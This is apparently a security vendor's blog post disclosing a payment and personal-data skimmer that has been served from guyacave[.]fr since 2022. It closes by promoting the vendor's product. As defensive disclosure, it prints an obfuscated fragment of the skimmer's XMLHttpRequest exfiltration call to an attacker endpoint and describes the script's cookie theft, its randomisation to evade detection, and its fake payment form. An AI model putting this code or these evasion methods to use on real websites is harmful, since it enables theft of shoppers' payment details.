c/side just detected a client-side attack that’s been active for over 2 years. The domain guyacave[.]fr is serving a Personal Identifiable Information (PII) skimmer script on multiple websites since August of 2022. Check your website now, and remove the script with the domain immediately if found.
During analysis of malicious scripts we came across a website infected by one. On this website, we can see it’s been active since August of 2022. We've notified this, and other websites of this attack.
In further research, we came across a post by Decoded Avast from November 2022 where the domain guyacave[.]fr was already mentioned as malicious.
They write:
Attackers also exploited other legitimate sites, such as sites selling clothes, shoes, jewellery, furniture and medical supplies, to host their skimming code. Specifically, they used guyacave[.]fr, servair[.]com and stripefaster[.]com. Attackers exfiltrated payment details via the POST request to URLs like guyacave[.]fr/js/tiny_mce/themes/modern/themes.php and similar for the other domains. In some cases, the POST request was sent to the infected e-commerce site itself, indicating that the attacker has full access to the compromised sites. We protected nearly 17,000 users globally from this webskimmer.
The inline URL: _0x800b[140];var _0xb61ex27= new XMLHttpRequest();_0xb61ex27[_0x800b[143]](_0x800b[141],_0x800b[142],true);_0xb61ex27[_0x800b[144]](_0xb61ex25) - inside the script indicates it uses an XML HTTP request to send the private payment details to an external endpoint. In this case, being https://guyacave[.]fr/js/tiny_mce/themes/modern/themes.php.
The script has functions for reading and writing cookies. Likely used to steal session cookies and other sensitive information stored in the browser.
We also found the Math.random() function to create dynamic elements. This is what makes third-party scripts dangerous, and securing them essential. Any third-party script is inherently dynamic, and can change based on all kinds of parameters. This Math.random() function helps to evade simple signature-based detection methods.
c/side’s engine is more advanced, and was able to detect and block this malicious script.
Finally, the script manipulates the website’s UI to hide certain elements. This through the simple display:none function, to present the fake payment form instead of the real one.
Threat feeds are the main way businesses inform themselves on malicious domains linked on their website. At c/side, we don’t believe this is the best solution for client-side security.
The 1st reason threat feeds don’t work
To date, only 10 out of 96 security vendors on VirusTotal flagged this domain as malicious. Threat feeds have their purpose, but are insufficient in client-side security. This attack shows that even after 2 years, most feeds have not caught up. At best, they catch and alert after the fact. At worst, it goes undetected for years.
Prevention is the next step
Even if the domain was flagged earlier and by more feeds, attackers could simply search for a new domain that suits their needs.
Threat feeds rely on checking the source, in this case the domain, not the payload of the code. This makes detection practically impossible until someone manually flags it. This makes threat feeds a reactionary solution, not a preventative one.
In our tests, c/side was able to detect and block this malicious script and domain. Had these websites, or the platforms they were built on, have c/side in place, this attack would’ve been noticed and stopped immediately.
On each session, we load third-party scripts in a secure proxy which checks the actual payload of the script, not just the sources and domains. If we detect anything suspicious, our customers are alerted and the script is blocked from loading in the browser of the website visitor.
You can sign up for c/side and protect your site in minutes.